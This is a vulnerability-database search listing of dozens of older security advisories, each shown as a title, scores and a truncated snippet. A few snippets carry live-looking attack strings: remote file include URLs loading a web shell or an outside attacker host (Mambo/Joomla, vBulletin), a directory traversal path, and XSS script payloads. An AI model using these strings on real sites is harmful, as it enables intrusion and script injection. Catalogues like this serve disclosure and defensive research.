Lucene search
K
SecurityvulnsMost viewed

47153 matches found

securityvulns
securityvulns
added 2007/06/26 12:0 a.m.138 views

Ingres wakeup setuid(ingres) file truncation

======= Summary ======= Name: wakeup setuidingres file truncation Release Date: 25 June 2007 Reference: NGS00390 Discover: Chris Anley [email protected] Vendor: Ingres Vendor Reference: Ingres bug 115913, CVE-2007-3337, CAID 35451 Systems Affected: Ingres 2006 9.0.4 and prior Risk: Medium...

2.1CVSS0.2AI score0.00355EPSS
Exploits5
securityvulns
securityvulns
added 2007/02/27 12:0 a.m.138 views

ViewCVS 0.9.4 issues

-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Hi! Short version for the busy ones: o Security issue on ViewCVS 0.9.4 o Not really exploitable unless malicious users have CVS write access AND victim visits pre-crafted URL ViewCVS 0.9.4...

4.3CVSS5.4AI score0.01235EPSS
Exploits0
securityvulns
securityvulns
added 2005/10/13 12:0 a.m.138 views

Ethernet frame padding information leakage

Incorrect memory managment causes ethernet fame padding bytes may contain sensitive information...

5CVSS1.9AI score0.73006EPSS
Exploits15References6Affected Software1
securityvulns
securityvulns
added 2005/09/14 12:0 a.m.138 views

Mozilla / Mozilla Firefox authentication weakness

Dear bugTraq, I have reported this issue some time ago: http://www.security.nnov.ru/Fnews19.html but it looks like it was ignored, and not fixed in latest mozilla and firefox releases, so I decided to send "formal" advisory Issue: Mozilla browsers authentication weakness Author: 3APA3A...

1.5AI score
Exploits0
securityvulns
securityvulns
added 2015/04/16 12:0 a.m.137 views

[SYSS-2015-014] Panda Global Protection 2015 - Authentication Bypass

-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA512 Advisory ID: SYSS-2015-014 Product: Panda Global Protection 2015 Vendor: Panda Security Affected Versions: 15.1.0 Tested Versions: 15.1.0 Vulnerability Type: Authentication Bypass Using an Alternate Path or Channel CWE-288 Risk Level: Medium Solutio...

0.2AI score
Exploits0
securityvulns
securityvulns
added 2015/01/02 12:0 a.m.137 views

[KIS-2014-16] Osclass <= 3.4.2 (contact.php) Unrestricted File Upload Vulnerability

--------------------------------------------------------------------- Osclass = 3.4.2 contact.php Unrestricted File Upload Vulnerability --------------------------------------------------------------------- - Software Link: http://osclass.org/ - Affected Versions: Version 3.4.2 and probably prior...

6.8CVSS0.3AI score0.02514EPSS
Exploits2
securityvulns
securityvulns
added 2014/10/18 12:0 a.m.137 views

APPLE-SA-2014-10-16-5 OS X Server v2.2.5

-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 APPLE-SA-2014-10-16-5 OS X Server v2.2.5 OS X Server v2.2.5 is now available and addresses the following: Server Available for: OS X Mountain Lion v10.8.5 Impact: An attacker may be able to decrypt data protected by SSL Description: There are known...

4.3CVSS4.5AI score0.99999EPSS
Exploits7
securityvulns
securityvulns
added 2014/05/05 12:0 a.m.137 views

ESA-2014-019: RSA BSAFE® Micro Edition Suite Certificate Chain Processing Vulnerability

ESA-2014-019.txt -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 ESA-2014-019: RSA BSAFE® Micro Edition Suite Certificate Chain Processing Vulnerability EMC Identifier: ESA-2014-019 CVE Identifier: CVE-2014-0636 Severity Rating: CVSS v2 Base Score: 9.3 AV:N/AC:M/Au:N/C:C/I:C/A:C Affected Products:...

5.8CVSS0.2AI score0.00669EPSS
Exploits0
securityvulns
securityvulns
added 2014/05/05 12:0 a.m.137 views

[SWRX-2014-001] Open Web Analytics Pre-Auth SQL Injection

Dell SecureWorks Security Advisory SWRX-2014-001 Open Web Analytics Pre-Auth SQL Injection Advisory Information Title: Open Web Analytics Pre-Auth SQL Injection Advisory ID: SWRX-2014-001 Advisory URL: http://www.secureworks.com/cyber-threat-intelligence/advisories/SWRX-2014-001/ Date published:...

7.5CVSS0.3AI score0.02495EPSS
Exploits7
securityvulns
securityvulns
added 2013/07/29 12:0 a.m.137 views

Xymon Systems and Network Monitor - remote file deletion vulnerability

Advisory ID: HTB23163 Product: Magnolia CMS Vendor: Magnolia International Ltd Vulnerable Versions: 4.5.7, 4.5.8, 4.5.9, 5.0 and 5.0.1 Community Edition Tested Version: 5.0 Community Edition Vendor Notification: July 3, 2013 Vendor Patch: July 18, 2013 Public Disclosure: July 24, 2013 Vulnerabili...

4.3CVSS0.8AI score0.0353EPSS
Exploits3
securityvulns
securityvulns
added 2013/07/29 12:0 a.m.137 views

Cross-Site Scripting (XSS) in Magnolia CMS

Advisory ID: HTB23163 Product: Magnolia CMS Vendor: Magnolia International Ltd Vulnerable Versions: 4.5.7, 4.5.8, 4.5.9, 5.0 and 5.0.1 Community Edition Tested Version: 5.0 Community Edition Vendor Notification: July 3, 2013 Vendor Patch: July 18, 2013 Public Disclosure: July 24, 2013 Vulnerabili...

4.3CVSS0.6AI score0.0353EPSS
Exploits3
securityvulns
securityvulns
added 2013/02/24 12:0 a.m.137 views

Alt-N MDaemon's WorldClient Username Enumeration Vulnerability

==================================================================== Alt-N MDaemon's WorldClient Username Enumeration Vulnerability ==================================================================== Software: Alt-N MDaemon v13.0.3 and prior versions Vendor: http://www.altn.com/ Vuln Type:...

0.4AI score
Exploits0
securityvulns
securityvulns
added 2012/07/16 12:0 a.m.137 views

Phonalisa v5.0 VoiP - Multiple Web Vulnerabilities

Title: ====== Phonalisa v5.0 VoiP - Multiple Web Vulnerabilities Date: ===== 2012-06-16 References: =========== http://www.vulnerability-lab.com/getcontent.php?id=526 VL-ID: ===== 526 Common Vulnerability Scoring System: ==================================== 6.5 Introduction: ============= Die...

0.1AI score
Exploits0
securityvulns
securityvulns
added 2012/02/08 12:0 a.m.137 views

ESA-2012-010: EMC Documentum xPlore information disclosure vulnerability

-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 ESA-2012-010: EMC Documentum xPlore information disclosure vulnerability. EMC Identifier: ESA-2012-010 EMC Identifier: SRCH-7949 CVE Identifier: CVE-2012-0396 Severity Rating: CVSS v2 Base Score: 4.0 AV:N/AC:L/Au:S/C:P/I:N/A:N Affected products: EMC S...

4CVSS0.7AI score0.01081EPSS
Exploits0
securityvulns
securityvulns
added 2009/06/10 12:0 a.m.137 views

Microsoft Security Bulletin MS09-022 - Critical Vulnerabilities in Windows Print Spooler Could Allow Remote Code Execution (961501)

Microsoft Security Bulletin MS09-022 - Critical Vulnerabilities in Windows Print Spooler Could Allow Remote Code Execution 961501 Published: June 9, 2009 Version: 1.0 General Information Executive Summary This security update resolves three privately reported vulnerabilities in Windows Print...

10CVSS1.4AI score0.34878EPSS
Exploits10
securityvulns
securityvulns
added 2009/02/07 12:0 a.m.137 views

[security bulletin] HPSBPI02398 SSRT080166 rev.1 - Certain HP LaserJet Printers, HP Color LaserJet Printers, and HP Digital Senders, Remote Unauthorized Access to Files

-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 SUPPORT COMMUNICATION - SECURITY BULLETIN Document ID: c01623905 Version: 1 HPSBPI02398 SSRT080166 rev.1 - Certain HP LaserJet Printers, HP Color LaserJet Printers, and HP Digital Senders, Remote Unauthorized Access to Files NOTICE: The information in...

7.8CVSS6.2AI score0.03514EPSS
Exploits0
securityvulns
securityvulns
added 2009/01/16 12:0 a.m.137 views

Digital Security Research Group [DSecRG] Advisory #DSECRG-09-001

Digital Security Research Group DSecRG Advisory DSECRG-09-001 Application: Oracle Application Server SOA Versions Affected: Oracle Application Server SOA version 10.1.3.1.0 Vendor URL: http://www.oracle.com Bugs: XSS Exploits: YES Reported: 10.01.2008 Vendor response: 11.01.2008 Date of Public...

5.5CVSS8.8AI score0.01018EPSS
Exploits1
securityvulns
securityvulns
added 2007/12/26 12:0 a.m.137 views

[CVE-2007-5342] Apache Tomcat's default security policy is too open

-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 CVE-2007-5342: Tomcat's default security policy is too open Severity: Low Vendor: The Apache Software Foundation Versions Affected: Tomcat 5.5.9 to 5.5.25 Tomcat 6.0.0 to 6.0.15 Description: The JULI logging component allows web applications to provid...

6.4CVSS7.2AI score0.05156EPSS
Exploits1
securityvulns
securityvulns
added 2007/04/19 12:0 a.m.137 views

com_mosmedia for Mambo & Jommla <= Remote File Include Vulnerability

commosmedia for Mambo & Jommla = Remote File Include Vulnerability - Exloit : - /components/commosmedia/media.tab.php?mosConfigabsolutepath=r57.txt? - /components/commosmedia/media.divs.php?mosConfigabsolutepath=r57.txt? - Page Script : -...

0.6AI score
Exploits0
securityvulns
securityvulns
added 2007/02/22 12:0 a.m.137 views

Pics Navigator Directory Traversal Vulnerability

Pics Navigator Directory Traversal Vulnerability By : sn0oPy Risk : medium site : http://www.jeunes-webmasters.com/ Dork : "Powered by J-Web Pics Navigator v2.0" | inurl:"jwpn-photos.php" | exploit : for the v1.0 http://www.target/gallery directory/pn-menu.php?ret=Pics20Navigator&dir=../../../ fo...

1.2AI score
Exploits0
securityvulns
securityvulns
added 2006/07/06 12:0 a.m.137 views

vBulletin 3.5.4 (install_path) Exploit

vBulletin 3.5.4 installpath Exploit - by: CarcaBot - application : vbulletin - URL : http://www.vbulletin.com - Exploit: www.vicitimsite.com/forumpath/install/upgrade301.php?step=http://CarcaBot.Ro - More Details: Dump SQL DB named user then u have access at all md5 users passwords...

1.4AI score
Exploits0
securityvulns
securityvulns
added 2004/11/22 12:0 a.m.137 views

Danware NetOp information leak

System information leak...

1.4AI score
Exploits0References1Affected Software1
securityvulns
securityvulns
added 2014/12/22 12:0 a.m.136 views

Persistent XSS Vulnerability in CMS Papoo Light v6.0.0 Rev. 4701

Advisory: Persistent XSS Vulnerability in CMS Papoo Light v6 Advisory ID: SROEADV-2014-01 Author: Steffen Rцsemann Affected Software: CMS Papoo Version 6.0.0 Rev. 4701 Vendor URL: http://www.papoo.de/ Vendor Status: fixed CVE-ID: - ========================== Vulnerability Description:...

5.9AI score
Exploits0
securityvulns
securityvulns
added 2014/06/14 12:0 a.m.136 views

[ MDVSA-2014:116 ] file

-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Mandriva Linux Security Advisory MDVSA-2014:116 http://www.mandriva.com/en/support/security/ Package : file Date : June 10, 2014 Affected: Business Server 1.0 Problem Description: Updated file packages fix security vulnerabilities: A flaw was found in...

5CVSS6.7AI score0.20805EPSS
Exploits0
securityvulns
securityvulns
added 2014/05/05 12:0 a.m.136 views

phpMyBackupPro-2.4 Cross-Site Scripting vulnerability

phpmybackuppro Cross-Site Scripting vulnerability @@@ @@@@@@@@@@@ @@@@@ @@@@@@@@@@ @@@ @@@@@@@ @@@ @@@@@@@@@@@ @@@ @@ @@@ @@ @@@ @@@@@@@@ @@@ @@@ @@@ @@ @@@ @@ @@@ @@@ @@@ @@@ @@@ @@@ @@ @@@ @@ @@@ @@@ @@@ @@@ @@@@@@@@@@@ @@@ @ @@@@@@@@@@ @@@ @@@@@@ @@@ @@@@@@@@@@@ @@@ @@ @@@ @@ @@@ @@@@@@ @@@ @@...

0.9AI score
Exploits0
securityvulns
securityvulns
added 2014/02/10 12:0 a.m.136 views

Inteno DG301 Command Injection

Background According to the vendor, Inteno DG301 is a high-end Multi-WAN residential gateway with advanced router and bridge functions. 2. Summary Inteno DG301 Powered by LuCI Trunk inteno-1.0.34 and OpenWrt Backfire 10.03.1-RC6 is vulnerable to command injection, which can be exploited directly...

1AI score
Exploits0
securityvulns
securityvulns
added 2013/07/15 12:0 a.m.136 views

Linksys X3000 - Multiple Vulnerabilities

Device: X3000 Vendor: Linksys ============ Vulnerable Firmware Releases: ============ Firmware Version: v1.0.03 build 001 Jun 11,2012 ============ Vulnerability Overview: ============ OS Command Injection The vulnerability is caused by missing input validation in the pingip parameter and can be...

8AI score
Exploits0
securityvulns
securityvulns
added 2012/06/03 12:0 a.m.136 views

DDIVRT-2012-43 SCLIntra Enterprise SQL Injection and Authentication Bypass

Title ----- DDIVRT-2012-43 SCLIntra Enterprise SQL Injection and Authentication Bypass Severity -------- High Date Discovered --------------- April 2, 2012 Discovered By ------------- Digital Defense, Inc. Vulnerability Research Team Credit: r@b13$ Vulnerability Description...

0.6AI score
Exploits0
securityvulns
securityvulns
added 2011/12/19 12:0 a.m.136 views

0A29-11-3 : Cross-Site Scripting vulnerabilities in Nagios XI < 2011R1.9

================ Cross-Site Scripting vulnerabilities in Nagios XI 2011R1.9 Author: 0a29406d9794e4f9b30b3c5d6702c708 twitter.com/0a29 - 0a29.blogspot.com - GMail 0a2940 ================ Description: ================ Multiple XSS vulnerabilities exist within Nagios XI. It is entirely likely this...

6.1AI score
Exploits0
securityvulns
securityvulns
added 2011/11/06 12:0 a.m.136 views

Web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)

PHP inclusions, SQL injections, directory traversals, crossite scripting, information leaks, etc...

7.5CVSS1.6AI score0.51891EPSS
Exploits5References17Affected Software12
securityvulns
securityvulns
added 2011/08/17 12:0 a.m.136 views

SAY Comunicacion (producto.php?id) Remote SQL injection Vulnerability

IRANIAN THE BEST HACKERS IN THE WORLD Remote SQL injection Vulnerability SAY Comunicacion producto.php?id AuTh0r : EhsanHp200 H0ME : www.ehsanhp.blogsky.com Email : [email protected] Vendor : http://www.saycomunicacion.com/ Persian Gulf 4 Ever! Dork : "Diseno Web:SAY Comunicacion"...

3AI score
Exploits0
securityvulns
securityvulns
added 2011/08/03 12:0 a.m.136 views

ZDI-11-245: Sybase Adaptive Server Backup and Monitor Server Translation Array Remote Code Execution Vulnerability

ZDI-11-245: Sybase Adaptive Server Backup and Monitor Server Translation Array Remote Code Execution Vulnerability http://www.zerodayinitiative.com/advisories/ZDI-11-245 July 29, 2011 -- CVSS: 10, AV:N/AC:L/Au:N/C:C/I:C/A:C -- Affected Vendors: Sybase -- Affected Products: Sybase Adaptive Server ...

0.6AI score
Exploits0
securityvulns
securityvulns
added 2011/08/01 12:0 a.m.136 views

[USN-1181-1] libsoup2.4 vulnerability

========================================================================== Ubuntu Security Notice USN-1181-1 July 28, 2011 libsoup2.4 vulnerability ========================================================================== A security issue affects these releases of Ubuntu and its derivatives: -...

5CVSS0.4AI score0.01925EPSS
Exploits0
securityvulns
securityvulns
added 2011/07/26 12:0 a.m.136 views

Funnel Web (directory.php?cid) Remote SQL injection Vulnerability

IRANIAN THE BEST HACKERS IN THE WORLD Remote SQL injection Vulnerability Funnel Web directory.php?cid AuTh0r : EhsanHp200 H0ME : www.ehsanhp.blogsky.com Email : [email protected] Vendor : http://www.funnel-web.com.au/ Persian Gulf 4 Ever! Dork : "Web site design by Funnel Web"...

2.8AI score
Exploits0
securityvulns
securityvulns
added 2011/06/10 12:0 a.m.136 views

ZDI-11-184: Oracle Java ICC Profile Sequence Description 'pseq' Tag Parsing Remote Code Execution Vulnerability

ZDI-11-184: Oracle Java ICC Profile Sequence Description 'pseq' Tag Parsing Remote Code Execution Vulnerability http://www.zerodayinitiative.com/advisories/ZDI-11-184 June 8, 2011 -- CVE ID: CVE-2011-0862 -- CVSS: 9, AV:N/AC:L/Au:N/C:P/I:P/A:C -- Affected Vendors: Oracle -- Affected Products:...

10CVSS0.6AI score0.06277EPSS
Exploits0
securityvulns
securityvulns
added 2011/04/26 12:0 a.m.136 views

HTB22955: Path disclosure in BuddyPress WordPress plugin

Vulnerability ID: HTB22955 Reference: http://www.htbridge.ch/advisory/pathdisclosureinbuddypresswordpressplugin.html Product: BuddyPress Vendor: BuddyPress http://buddypress.org/ Vulnerable Version: 1.2.8 Vendor Notification: 12 April 2011 Vulnerability Type: Path disclosure Risk level: Low Credi...

7AI score
Exploits0
securityvulns
securityvulns
added 2010/12/24 12:0 a.m.136 views

MyBB 1.6 <= SQL Injection Vulnerability

================================= MyBB 1.6 = SQL Injection Vulnerability ================================= 1. OVERVIEW Potential SQL Injection vulnerability was detected in MyBB. 2. APPLICATION DESCRIPTION MyBB is a free bulletin board system software package developed by the MyBB Group. It's...

Exploits0
securityvulns
securityvulns
added 2010/11/18 12:0 a.m.136 views

JQuarks4s Joomla Component 1.0.0 Blind SQL Injection Vulnerability

JQuarks4s Joomla Component 1.0.0 Blind SQL Injection Vulnerability Name JQuarks4s Vendor http://www.iptechinside.com/labs/projects/listfiles/jquarks-for-surveys Versions Affected 1.0.0 Author Salvatore Fresta aka Drosophila Website http://www.salvatorefresta.net Contact salvatorefresta at gmail d...

0.2AI score
Exploits0
securityvulns
securityvulns
added 2010/06/25 12:0 a.m.136 views

Mozilla Foundation Security Advisory 2010-29

Mozilla Foundation Security Advisory 2010-29 Title: Heap buffer overflow in nsGenericDOMDataNode::SetTextInternal Impact: Critical Announced: June 22, 2010 Reporter: Nils MWR InfoSecurity Products: Firefox, Thunderbird, SeaMonkey Fixed in: Firefox 3.6.4 Firefox 3.5.10 Thunderbird 3.0.5 SeaMonkey...

9.3CVSS0.4AI score0.04879EPSS
Exploits0
securityvulns
securityvulns
added 2010/04/05 12:0 a.m.136 views

ZDI-10-056: Sun Java Runtime Environment Trusted Methods Chaining Remote Code Execution Vulnerability

ZDI-10-056: Sun Java Runtime Environment Trusted Methods Chaining Remote Code Execution Vulnerability http://www.zerodayinitiative.com/advisories/ZDI-10-056 April 5, 2010 -- CVE ID: CVE-2010-0840 -- Affected Vendors: Sun Microsystems -- Affected Products: Sun Microsystems Java Runtime --...

7.5CVSS0.2AI score0.96319EPSS
Exploits5
securityvulns
securityvulns
added 2010/03/11 12:0 a.m.136 views

[XSS] i found a xss on "page" parameter in "eccredit.php" in Dvbbs < 8.3.0

Home Page : http://www.dvbbs.net/ Dvbbs is prone to an cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input. An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the...

0.7AI score
Exploits0
securityvulns
securityvulns
added 2010/01/28 12:0 a.m.136 views

[RT-SA-2010-003] Geo++(R) GNCASTER: Faulty implementation of HTTP Digest Authentication

Advisory: Geo++R GNCASTER: Faulty implementation of HTTP Digest Authentication During a penetration test, RedTeam Pentesting discovered that the GNCaster software has multiple bugs in its implementation of HTTP Digest Authentication. Details ======= Product: Geo++R GNCASTER Affected Versions: =...

0.1AI score
Exploits0
securityvulns
securityvulns
added 2008/12/10 12:0 a.m.136 views

XSS in PHPepperShop v 1.4

Vulnerable Version:PHPepperShop v 1.4 Homepage:http://www.phpeppershop.com This is 4 reflective XSS flaws in the URI. Trust no one not even your $SERVERPHPSELF http://10.1.1.10/shop/kontakt.php/'scriptalert1/script http://10.1.1.10/index.php/223Cscript3Ealert13C/script3E...

6.2AI score
Exploits0
securityvulns
securityvulns
added 2008/07/07 12:0 a.m.136 views

[SECURITY] [DSA 1602-1] New pcre3 packages fix arbitrary code execution

-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 - ------------------------------------------------------------------------ Debian Security Advisory DSA-1602-1 [email protected] http://www.debian.org/security/ Florian Weimer July 05, 2008 http://www.debian.org/security/faq -...

7.5CVSS0.5AI score0.06726EPSS
Exploits3
securityvulns
securityvulns
added 2008/06/16 12:0 a.m.136 views

SMF <= 1.1.4 COOKIE[topic] SQL-Injection Exploit

Здравствуйте, Зараза. Поддержим отечественного произодителя. SMF = 1.1.4 COOKIEtopic SQL-Injection Exploit www.simplemachines.org Уязвимость заключается в неопределенном параметре $topic. Атакующий может определить его значение и выполнить произольный SQL-запрос в базу данных приложения...

0.9AI score
Exploits0
securityvulns
securityvulns
added 2008/04/05 12:0 a.m.136 views

Cisco Security Advisory: Cisco Unified Communications Disaster Recovery Framework Command Execution Vulnerability

-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Cisco Security Advisory: Cisco Unified Communications Disaster Recovery Framework Command Execution Vulnerability Advisory ID: cisco-sa-20080403-drf http://www.cisco.com/warp/public/707/cisco-sa-20080403-drf.shtml Revision 1.0 For Public Release 2008...

10CVSS0.3AI score0.05139EPSS
Exploits1
securityvulns
securityvulns
added 2007/05/14 12:0 a.m.136 views

Cross-Site Scripting in Adobe RoboHelp 6, Server 6 and X5

Hi, I'd like to inform you about a XSS-vulnerability in Adobe RoboHelp 6, RoboHelp Server 6 and RoboHelp X5. See attached advisory below. I - TITLE Security advisory: Cross-Site Scripting in RoboHelp 6, RoboHelp Server 6 and RoboHelp X5 II - SUMMARY Description: A Cross-Site Scripting Flaw in...

6.4AI score
Exploits0
securityvulns
securityvulns
added 2007/02/21 12:0 a.m.136 views

[Full-disclosure] Blind sql injection attack in INSERT syntax on PHP-nuke <=8.0 Final

Hello, it is my new advisory: Problem:Blind sql injection attack in INSERT syntax Product:PHP-nuke =8.0 Web page:http://phpnuke.org/ Credit:Maciej krasza Kukla @mail:[email protected] homepage:www.krasza.int.pl 1.Description ...PHP-Nuke 8.0 Final version. This version includes a new anti-flood...

0.1AI score
Exploits0
securityvulns
securityvulns
added 2006/11/22 12:0 a.m.136 views

Etomite CMS 0.6.1.2 Vulnerabilities + ContenNow 1.39 Vulnerabilities + Exploits

Etomite CMS 0.6.1.2 Multiple Vulnerabilities Severity : Medium risk Vendor : www.etomite.org Author : Alfredo Pesoli 'revenge' Secunia Advisory : SA22885 Security Focus BID : 21135 -------------------------------------------------- Description Etomite is a PHP Content Management System, more info...

0.1AI score
Exploits0
securityvulns
securityvulns
added 2006/03/08 12:0 a.m.136 views

[SA19142] Owl Intranet Engine "xrms_file_root" File Inclusion Vulnerability

TITLE: Owl Intranet Engine "xrmsfileroot" File Inclusion Vulnerability SECUNIA ADVISORY ID: SA19142 VERIFY ADVISORY: http://secunia.com/advisories/19142/ CRITICAL: Highly critical IMPACT: System access WHERE: From remote SOFTWARE: Owl Intranet Engine 0.x http://secunia.com/product/1579/...

0.7AI score
Exploits0
Total number of security vulnerabilities5000